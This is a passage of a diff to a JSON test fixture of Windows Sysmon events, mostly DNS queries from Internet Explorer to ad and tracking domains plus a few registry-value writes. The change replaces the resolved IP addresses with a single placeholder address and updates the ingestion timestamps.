spcms-global.pbp.gysm.yahoodns.net;::ffff:74.6.137.78;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028412800Z'/\u003e\u003cEventRecordID\u003e77\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.291\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecms.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1484,12 +1477,12 @@ "type": "CNAME" }, { - "data": "23.52.167.93", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "network": { @@ -1506,13 +1499,13 @@ "cvision.media.net" ], "ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741107300Z", + "ingested": "2021-12-09T13:50:23.456662500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028501000Z'/\u003e\u003cEventRecordID\u003e78\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecvision.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028501000Z'/\u003e\u003cEventRecordID\u003e78\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecvision.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1580,17 +1573,17 @@ "type": "CNAME" }, { - "data": "204.79.197.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "13.107.21.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -1607,14 +1600,13 @@ "g.bing.com" ], "ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741115800Z", + "ingested": "2021-12-09T13:50:23.456668500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028585600Z'/\u003e\u003cEventRecordID\u003e79\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.424\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eg.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028585600Z'/\u003e\u003cEventRecordID\u003e79\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.424\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eg.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1674,12 +1666,12 @@ }, "answers": [ { - "data": "23.52.167.93", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "network": { @@ -1694,13 +1686,13 @@ "lg3.media.net" ], "ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741123900Z", + "ingested": "2021-12-09T13:50:23.456674100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028900300Z'/\u003e\u003cEventRecordID\u003e80\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.427\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elg3.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028900300Z'/\u003e\u003cEventRecordID\u003e80\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.427\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elg3.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1764,22 +1756,22 @@ "type": "CNAME" }, { - "data": "54.88.96.255", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.233.100.168", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.209.58.223", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "54.88.96.255", - "34.233.100.168", - "54.209.58.223" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -1795,15 +1787,13 @@ "service.sp.advertising.com" ], "ip": [ - "54.88.96.255", - "34.233.100.168", - "54.209.58.223" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741132300Z", + "ingested": "2021-12-09T13:50:23.456679700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029031100Z'/\u003e\u003cEventRecordID\u003e81\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.469\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eservice.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:54.88.96.255;::ffff:34.233.100.168;::ffff:54.209.58.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029031100Z'/\u003e\u003cEventRecordID\u003e81\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.469\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eservice.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -1863,7 +1853,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741141Z", + "ingested": "2021-12-09T13:50:23.456685200Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:44.723248500Z'/\u003e\u003cEventRecordID\u003e2686\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:44.714\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-7554-5eb1-6d00-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4320\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\Explorer.EXE\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\u003c/Data\u003e\u003cData Name='Details'\u003eBinary Data\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -1932,12 +1922,12 @@ "type": "CNAME" }, { - "data": "184.25.176.117", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "184.25.176.117" + "89.160.20.156" ] }, "network": { @@ -1954,13 +1944,13 @@ "sb.scorecardresearch.com" ], "ip": [ - "184.25.176.117" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741149300Z", + "ingested": "2021-12-09T13:50:23.456691100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029098400Z'/\u003e\u003cEventRecordID\u003e82\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.485\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:184.25.176.117;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029098400Z'/\u003e\u003cEventRecordID\u003e82\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.485\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2028,12 +2018,12 @@ "type": "CNAME" }, { - "data": "40.114.54.223", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "40.114.54.223" + "89.160.20.156" ] }, "network": { @@ -2050,13 +2040,13 @@ "otf.msn.com" ], "ip": [ - "40.114.54.223" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741157700Z", + "ingested": "2021-12-09T13:50:23.456696700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029112900Z'/\u003e\u003cEventRecordID\u003e83\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.500\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eotf.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:40.114.54.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029112900Z'/\u003e\u003cEventRecordID\u003e83\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.500\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eotf.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2122,7 +2112,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741166300Z", + "ingested": "2021-12-09T13:50:23.456702400Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 